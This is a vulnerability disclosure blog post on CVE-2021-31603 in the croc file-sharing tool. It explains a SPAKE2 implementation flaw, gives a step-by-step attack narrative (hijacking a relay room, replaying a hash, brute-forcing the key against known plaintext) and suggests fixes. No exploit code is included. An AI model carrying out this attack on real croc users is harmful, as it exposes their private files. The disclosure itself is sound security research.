Croc Full Plaintext Recovery - CVE-2021-31603

TL;DR

This blog post describes various security vulnerabilities we found within the popular file sharing service croc. These vulnerabilities can be chained together to launch file interception attacks against croc’s relay server.

With this practical attack, a remote attacker is able to intercept and decrypt all files sent via croc. An attacker does not need to host a malicious croc gateway, but is able to exploit any gateway. At the bottom of the blog post is a video of the attack.

Background

CVE-2021-31603 is a combination of multiple vulnerabilities that are mostly interesting from a cryptographer’s perspective. It also shows how an easy-to-get-wrong detail in the SPAKE2 protocol can completely break all security guarantees.

But first things first. What is croc?

On its Github page, croc is described as “a tool that allows any two computers to simply and securely transfer files and folders”. Among other things it claims end-to-end encryption using a password authenticated key exchange (PAKE). Croc’s usage is quite simple. The sender gets a three word passphrase that he can share with the receiver. The receiver just has to type in the passphrase to receive the files.

Croc Usage

To understand the attack, it’s also important to note that croc has a semi-centralized architecture.

Croc Architecture

Even if the sender and receiver have a direct connection for transmission later on, the sender and receiver always establish their connection via a relay server on the internet.

PAKEs

The centerpiece of the vulnerbaility is croc’s PAKE implementation. PAKE protocols are used to exchange a strong cryptographic key based on a low entropy shared secret. This is achieved by designing the protocol in such a way that an attacker can not brute force the low entropy shared secret based on the transcript and an active attacker can only try out one shared secret per protocol pass. It is the responsibility of the involved parties (here sender, relay and receiver) to detect and prevent online brute force attacks.

Usually, PAKE protocols make use of some group action like Elliptic Curve Diffie-Hellman (ECDH). The PAKE protocol used in croc is SPAKE2, which is based on the DH key exchange. SPAKE2 is depicted in the following message diagram.

SPAKE2 is basically a Elliptic Curve Diffie-Hellman key exchange using with additional blinding. \(P\) is the generator of the group used for Diffie-Hellman. The blinding factors are derived from public parameters \(U\) and \(V\) raised to the power of the passcode (\(p\)). Even if a passive attacker manages to iterate over all possible passcode to recover all possible public keys (\(\alpha P\), \(\beta P\)), he is still not able to compute the discrete logarithm of these public keys. He can therefore not compute the exchanged key \(w\) or identify the correct passcode \(pw\).

Croc’s Protocol

On a high level, croc’s file exchange protocol works in 8 steps:

  1. The sender generates a three-word passcode, e.g. anita-price-quick.
  2. The sender connects to the public relay.
  3. The sender joins a “room” on the relay. The room’s identifier are the first three characters of the passcode, e.g. ani.
  4. The receipient receives the passcode via a secure channel.
  5. The receipient connects to the public relay.
  6. The receipient joins the sender’s relay room, identifying it with the shared passcode.
  7. The sender and receiver establish a shared key \(k_e\) using SPAKE2 and the passcode \(pw\).
  8. The sender transfers the file, encrypted under \(k_e\), via a direct connection.

While it is possible to host your own relay, there is a hardcoded default relay hosted at DigitalOcean.

The Vulnerability

The critical vulnerability resides in croc’s SPAKE2 implementation. It implements SPAKE2 using elliptic curves and misses a crucial detail.

There is an RFC in the works, standardizing SPAKE2. The RFC’s draft contains a curious sentence that is quite important, but easy to overlook:

[...]
Note that the choice of M and N is critical for the security proof.
The generation methods specified in this document are designed to
eliminate concerns related to knowing discrete logs of M and N.
[...]

M and N refer to the public identities of the two involved parties, in our case sender and receiver. The identities are called \(U\) and \(V\) in our message diagram above. The RFC seems to hint that it is problematic to know the discrete logarithm of the identities. But why is that a problem?

Lets imagine an attacker \(Mallory\) which tries to impersonate party \(Alice\). The attacker knows the discrete logarithm of \(U = a_d P\) and sends an unblinded Diffie-Hellman parameter \(X = \alpha P\) to party \(Bob\). \(Bob\) then calculates:

$$\begin{aligned} w & = \beta(X - pU) \\ & = \beta(\alpha P - (a_d + p) P) \\ & = [(\alpha - a_d * p) + \beta] P \\ & = \alpha - a_d * p (\beta P) \\ & = \alpha - a_d * p(Y - pV) \end{aligned}$$

As \(Mallory\) knows \(\alpha, a_d, Y\) and \(V\), Bob’s \(w\) is reduced to the entropy of the passcode \(p\). This is highly problematic, since SPAKE2 is supposed to guarantee safety even for extremely low entropy passcodes. If \(Mallory\) can get \(Bob\) to encrypt anything under the key \(k\) derived from \(w\), \(Mallory\) can brute force the key. Note that this is only possible due to the fact that we know the discrete logarithm of \(U\). If \(U\) is choosen so that nobody knows the discrete logarithm, this attack is not possible.

The following code snipped shows how the initial SPAKE2 message is generated within croc’s SPAKE2 module.

120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
p.Role = 0
p.curve = curve
p.Pw = pw
rand1 := make([]byte, 8)
rand2 := make([]byte, 8)
_, err = rand.Read(rand1)
if err != nil {
    return
}
_, err = rand.Read(rand2)
if err != nil {
    return
}
p.Uᵤ, p.Uᵥ = p.curve.ScalarBaseMult(rand1)
p.Vᵤ, p.Vᵥ = p.curve.ScalarBaseMult(rand2)
if !p.curve.IsOnCurve(p.Uᵤ, p.Uᵥ) {
    err = errors.New("U values not on curve")
    return
}
if !p.curve.IsOnCurve(p.Vᵤ, p.Vᵥ) {
    err = errors.New("V values not on curve")
    return
}

// STEP: A computes X
p.Vpwᵤ, p.Vpwᵥ = p.curve.ScalarMult(p.Vᵤ, p.Vᵥ, p.Pw)
p.Upwᵤ, p.Upwᵥ = p.curve.ScalarMult(p.Uᵤ, p.Uᵥ, p.Pw)
p. = make([]byte, 8) // randomly generated secret
_, err = rand.Read(p.)
if err != nil {
    return
}
p.Aαᵤ, p.Aαᵥ = p.curve.ScalarBaseMult(p.)
p.Xᵤ, p.Xᵥ = p.curve.Add(p.Upwᵤ, p.Upwᵥ, p.Aαᵤ, p.Aαᵥ) // "X"
// now X should be sent to B

The highlighted lines show how the initializing party generates the identities for both parties, which are named \(U\) and \(V\). These values are exchanged together with the public parameter named \(X\) (just as in the message diagram above). In croc, the initializing party is the receipient of the file.

The second party - in croc this is the sender - takes these parameters and uses them for the further calculations. This means that an attacker can freely generate both identities \(U \),\(V\) and therefore knows their discrete logarithms. With this knowledge an attacker can impersonate every receipient by reducing the entopy of the cryptographic key as described above and brute force the key.

Exploit

The goal of the exploit is to show that an attacker can create a rogue receipient that receives files from strangers and is able to decrypt them without knowing the passcode, therefore fully breaking all security promises made by croc.

First, we have to initialize a connection with the sender. In order to do so we have to join the victim’s room on the relay. We know that the victim’s room is identified with the first three letters of the passcode. A look at the underlying wordlist shows that there are 896 possible rooms the victim can join.

The attack starts when our attacker - the rogue receipient - gets connected to a sender via the relay. Our rogue receipient behaves like a normal croc receipient and follows the normal protocol, depiced in the next diagram.

The recipient initializes the SPAKE2 key exchange by sending its blinded Diffie-Hellman parameter \(X\) as well as the public parameter \(U\) and \(V\).

The sender then answers with its public parameter \(Y\) as well as \(H_{kb}\), which is a bcrypt hash of the exchanged key. This is an absolutely terrible idea and already enough to brute force the exchanged key. Unfortunately, bcrypt is used for hashing, which is computationally expensive. With our resources we would need at least a few days to brute force the the passcode based on this hash. Since this is an interactive attack (no sender of a file will wait for a couple of days) we can’t do that.

In the next message the sender expects us to send him a bcrypt hash of the passcode as well. We can not generate such a hash without knowing the passcode. Luckily the sender does not check if the hash we provide is the same as the hash he send to us. Therefore, we can just replay his hash to bypass the check.

The sender then generates a salt which it will send to us. We just have to reply with the same salt. Together with the SPAKE2 exchanged secret \(k\) this salt will be used to derive the encryption key \(k_e\) using PBKDF2, \(k_e = PBKDF2(k, salt)\). This step does not provide any additional security since the key from the key exchange is already strong enough.

From now on, the sender will use AES-GCM with the derived key \(k_e\) to encrypt and tag all messages. The sender’s first encrypted message contains a list of its external IP addresses. The plaintext of this encrypted message has the form {"t":"externalip",...". To this point we could not brute force the passcode in a reasonable amount of time. But as the encrypted list of IP addresses is valid JSON and has a known prefix, we can use the encrypted message to brute force \(k_e\). This is possible because we reduced the entropy of the exchanged key \(k\) to that of the passcode by supplying our backdoored identities \(U\) and \(V\).

For bruteforcing we can generate an encryption key for all possible passcodes and try to decrypt the message using this key. We get the correct passcode once a valid decryption of the form {"t":"externalip",..." is found. Since the structure of the message is known, the exploit uses AES-CTR to decrypt the message and omits the validation of the GCM authentication tag for perfomance reasons.

The full passcode has an entropy of roughly 4 bytes which is painful to do in a short amount of time. However, the entropy can be further reduced since we know which room the sender connected to. The room identifier leaks the the first three letters of the first word from the passcode. A look at the wordlist reveals that at most two first words are possible per room identifier. With croc’s wordlist of size 1633, this reduces the passcode to \(2 * 1633^2 \approx 5 \cdot 10^6\) possible values.

Bruteforcing through 5 million possible ECDH keys should be easily doable on a strong computer. Unfortunately there are no optimized implementations available for the uncommon siec curve used within croc. So for our exploit to work in a reasonable time, we either had to properly implement the curve ourselves or throw more computational power at it. Out of convinience we took the latter option and spun up 10 AWS instances as bruteforce workers. They were able to find the decryption key \(k_e\) in - on average - 20 seconds. This is fast enough for an interactive attack, since the transmission of the passcode to the intended receipient is likely to take longer. Apart from that, since our rogue receipient is already occupying the room, the inteded receiver won’t be able to connect to the relay and will likely spend some time hunting for typos. Nevertheless, with more hardware or a faster implementation of siec it would easily be possible to decraese this time.

Now that we obtained the correct key \(k_e\) it’s possible to follow the normal protocol flow and start the transmission of the file. Once the encrypted file was transmitted, we can decrypt it with the recovered key \(k_e\).

Showcase

To show our working exploit in action we created a video of a successful attack. Notice that the sender (on the left) uses a freshly cloned up-to-date croc version. The rogue receipient - without knowledge of the generated passcode - can be seen on the right. In the video, you can see that the rogue receipient first hooks itself to the public relay and waits for a victim.

For entertainment value the video is slightly fast-forwarded. The critical bruteforce step took 17 seconds.

Further Problems with Croc

While taking a look at this application we noted other behavior which might not be directly exploitable but could lead to vulnerabilities in the future.

Active Man-In-The-Middle

This sender-to-relay connection is “secured” with a SPAKE2 key exchange. Strangely this connection uses the hardcoded passcode pass123 and therefore does not provide security against an active attacker. Although somewhat nasty, we won’t focus on this bug here because confidentiality and authenticity are not crucial for this step.

Protocol sequence is not enforced

All messages between the recipient and sender are handelt by the processMessage function in croc.go. This function does not enforce the sequence of the messages. If an encryption key is set incomming messages are decrypted. Otherwise the messages are processed without decryption. This allows an attacker to start the protocol with a external ip message and omit the key exchange to use the protocol without encryption. The only thing preventing the sender from sending the file unencrypted is the fact that the go crypto library will throw an error while encrypting data with a nil key and that will result in a panic.

Pathtraversal

The sender of the file specifies the path where the file will be stored but only the actual filename is displayed to the recipient. This could lead to the sender overwriting files without the knowledge of the recipient.

Fixes

Last but not least, we’ll give some advice on how to fix some of the problems listed above.

Error in the implementation of SPAKE2

As described in the RFC for SPAKE2 the public identities for both parties should be hardcoded by the application. These values should be chosen in a way where the developer can prove that it is unlikly for him to know the discrete logarithm of these values as well. Also there should be a check implemented which ensures that Hka and Hkb are different from each other.

Room leaks first word of the passcode

The room should not be derived from the passcode but rather uses a separat identifier, similar to how it is done in magic-wormhole.

Pathtraversal

The sender should not be able to control the path of the file. The recipient should just take the filename from the sender and should save the file to the current working directory.

Conclusion

A small bug can go a long way. It is difficult to implement crypto protocols correctly, especially when a small detail can completely break all security. Unfortunately that’s the case for most protocols. Cyptography is still scary.

Some of the design decisions in the croc protocols are quite weird (to use laymens terms). For us it seems plausible that the bug we found and described here is not the only one in the croc code base.

Update

Croc’s maintainer has now fixed this vulnerability and published a blog post about it.